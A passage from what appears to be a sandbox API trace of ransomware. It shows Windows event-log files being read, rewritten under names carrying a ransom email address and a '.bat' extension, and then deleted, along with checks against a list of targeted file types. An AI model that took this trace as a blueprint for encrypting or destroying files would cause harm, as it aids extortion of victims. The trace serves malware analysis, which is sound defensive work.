(lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.939] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0065.939] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.940] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.940] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0065.940] GetLastError () returned 0x0 [0065.940] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.942] WriteFile (in: hFile=0x3a0, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.944] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.944] WriteFile (in: hFile=0x3a0, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x128, lpOverlapped=0x0) returned 1 [0065.944] SetEndOfFile (hFile=0x3a0) returned 1 [0065.944] CloseHandle (hObject=0x3a0) returned 1 [0065.946] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.946] SetEndOfFile (hFile=0x344) returned 1 [0065.947] CloseHandle (hObject=0x344) returned 1 [0065.947] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.948] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx")) returned 1 [0065.948] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.948] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.948] lstrlenW (lpString=".doc") returned 4 [0065.948] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.948] lstrlenW (lpString=".docx") returned 5 [0065.948] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.948] lstrlenW (lpString=".pdf") returned 4 [0065.948] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.948] lstrlenW (lpString=".xls") returned 4 [0065.948] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.948] lstrlenW (lpString=".xlsx") returned 5 [0065.948] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.948] lstrlenW (lpString=".ppt") returned 4 [0065.948] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.948] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.948] lstrlenW (lpString=".zip") returned 4 [0065.948] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.948] lstrlenW (lpString=".rar") returned 4 [0065.948] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.948] lstrlenW (lpString=".bz2") returned 4 [0065.948] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.948] lstrlenW (lpString=".7z") returned 3 [0065.948] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.948] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.948] lstrlenW (lpString=".dbf") returned 4 [0065.949] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.949] lstrlenW (lpString=".1cd") returned 4 [0065.949] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.949] lstrlenW (lpString=".jpg") returned 4 [0065.949] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.949] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.949] lstrlenW (lpString=".doc") returned 4 [0065.949] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString=".docx") returned 5 [0065.949] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.949] lstrlenW (lpString=".pdf") returned 4 [0065.949] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString=".xls") returned 4 [0065.949] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString=".xlsx") returned 5 [0065.949] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.949] lstrlenW (lpString=".ppt") returned 4 [0065.949] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.949] lstrlenW (lpString=".zip") returned 4 [0065.949] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString=".rar") returned 4 [0065.949] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString=".bz2") returned 4 [0065.949] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.949] lstrlenW (lpString=".7z") returned 3 [0065.949] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.949] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.950] lstrlenW (lpString=".dbf") returned 4 [0065.950] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.950] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.950] lstrlenW (lpString=".1cd") returned 4 [0065.950] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.950] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0065.950] lstrlenW (lpString=".jpg") returned 4 [0065.950] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.950] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.950] lstrlenW (lpString="Microsoft-Windows-MUI%4Admin.evtx") returned 33 [0065.950] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0065.950] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0065.950] CloseHandle (hObject=0x344) returned 1 [0065.950] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx")) returned 0x20 [0065.951] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.951] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0065.951] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.951] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.951] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0065.952] GetLastError () returned 0x0 [0065.952] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.954] WriteFile (in: hFile=0x3a0, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.955] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.955] WriteFile (in: hFile=0x3a0, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x116, lpOverlapped=0x0) returned 1 [0065.956] SetEndOfFile (hFile=0x3a0) returned 1 [0065.956] CloseHandle (hObject=0x3a0) returned 1 [0065.957] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.957] SetEndOfFile (hFile=0x344) returned 1 [0065.958] CloseHandle (hObject=0x344) returned 1 [0065.959] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.959] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx")) returned 1 [0065.959] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.959] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.959] lstrlenW (lpString=".doc") returned 4 [0065.959] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.959] lstrlenW (lpString=".docx") returned 5 [0065.959] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.959] lstrlenW (lpString=".pdf") returned 4 [0065.959] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.959] lstrlenW (lpString=".xls") returned 4 [0065.959] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.959] lstrlenW (lpString=".xlsx") returned 5 [0065.959] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.959] lstrlenW (lpString=".ppt") returned 4 [0065.959] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.959] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.959] lstrlenW (lpString=".zip") returned 4 [0065.959] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.959] lstrlenW (lpString=".rar") returned 4 [0065.960] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.960] lstrlenW (lpString=".bz2") returned 4 [0065.960] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.960] lstrlenW (lpString=".7z") returned 3 [0065.960] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.960] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.960] lstrlenW (lpString=".dbf") returned 4 [0065.960] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.960] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.960] lstrlenW (lpString=".1cd") returned 4 [0065.960] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.960] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.960] lstrlenW (lpString=".jpg") returned 4 [0065.960] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.960] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.960] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.960] lstrlenW (lpString=".doc") returned 4 [0065.960] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.960] lstrlenW (lpString=".docx") returned 5 [0065.960] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.960] lstrlenW (lpString=".pdf") returned 4 [0065.960] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.960] lstrlenW (lpString=".xls") returned 4 [0065.960] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.960] lstrlenW (lpString=".xlsx") returned 5 [0065.960] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.960] lstrlenW (lpString=".ppt") returned 4 [0065.961] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.961] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.961] lstrlenW (lpString=".zip") returned 4 [0065.961] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.961] lstrlenW (lpString=".rar") returned 4 [0065.961] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.961] lstrlenW (lpString=".bz2") returned 4 [0065.961] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.961] lstrlenW (lpString=".7z") returned 3 [0065.961] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.961] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.961] lstrlenW (lpString=".dbf") returned 4 [0065.961] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.961] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.961] lstrlenW (lpString=".1cd") returned 4 [0065.961] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.961] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0065.961] lstrlenW (lpString=".jpg") returned 4 [0065.961] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.961] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.961] lstrlenW (lpString="Microsoft-Windows-MUI%4Operational.evtx") returned 39 [0065.961] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0065.961] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0065.962] CloseHandle (hObject=0x344) returned 1 [0065.962] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx")) returned 0x20 [0065.962] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.962] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0065.962] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.962] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.962] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0065.962] GetLastError () returned 0x0 [0065.962] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0066.339] WriteFile (in: hFile=0x3a0, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0066.341] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.341] WriteFile (in: hFile=0x3a0, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x122, lpOverlapped=0x0) returned 1 [0066.341] SetEndOfFile (hFile=0x3a0) returned 1 [0066.342] CloseHandle (hObject=0x3a0) returned 1 [0066.342] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.342] SetEndOfFile (hFile=0x344) returned 1 [0066.343] CloseHandle (hObject=0x344) returned 1 [0066.343] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.343] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx")) returned 1 [0066.885] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.885] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.885] lstrlenW (lpString=".doc") returned 4 [0066.885] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.885] lstrlenW (lpString=".docx") returned 5 [0066.885] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.885] lstrlenW (lpString=".pdf") returned 4 [0066.885] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.885] lstrlenW (lpString=".xls") returned 4 [0066.885] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.885] lstrlenW (lpString=".xlsx") returned 5 [0066.885] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.885] lstrlenW (lpString=".ppt") returned 4 [0066.885] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.885] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.885] lstrlenW (lpString=".zip") returned 4 [0066.885] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.885] lstrlenW (lpString=".rar") returned 4 [0066.885] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.885] lstrlenW (lpString=".bz2") returned 4 [0066.885] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString=".7z") returned 3 [0066.886] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.886] lstrlenW (lpString=".dbf") returned 4 [0066.886] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.886] lstrlenW (lpString=".1cd") returned 4 [0066.886] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.886] lstrlenW (lpString=".jpg") returned 4 [0066.886] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.886] lstrlenW (lpString=".doc") returned 4 [0066.886] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString=".docx") returned 5 [0066.886] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.886] lstrlenW (lpString=".pdf") returned 4 [0066.886] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString=".xls") returned 4 [0066.886] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString=".xlsx") returned 5 [0066.886] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.886] lstrlenW (lpString=".ppt") returned 4 [0066.886] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.886] lstrlenW (lpString=".zip") returned 4 [0066.886] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString=".rar") returned 4 [0066.886] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString=".bz2") returned 4 [0066.886] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.886] lstrlenW (lpString=".7z") returned 3 [0066.886] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.886] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.887] lstrlenW (lpString=".dbf") returned 4 [0066.887] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.887] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.887] lstrlenW (lpString=".1cd") returned 4 [0066.887] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.887] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 47 [0066.887] lstrlenW (lpString=".jpg") returned 4 [0066.887] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.887] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.887] lstrlenW (lpString="Microsoft-Windows-SettingSync%4Operational.evtx") returned 47 [0066.887] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.893] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0066.893] CloseHandle (hObject=0x368) returned 1 [0066.893] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx")) returned 0x20 [0066.893] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.893] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.893] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.893] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.893] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0066.894] GetLastError () returned 0x0 [0066.894] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0066.896] WriteFile (in: hFile=0x344, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0066.897] ReadFile (in: hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.897] WriteFile (in: hFile=0x344, 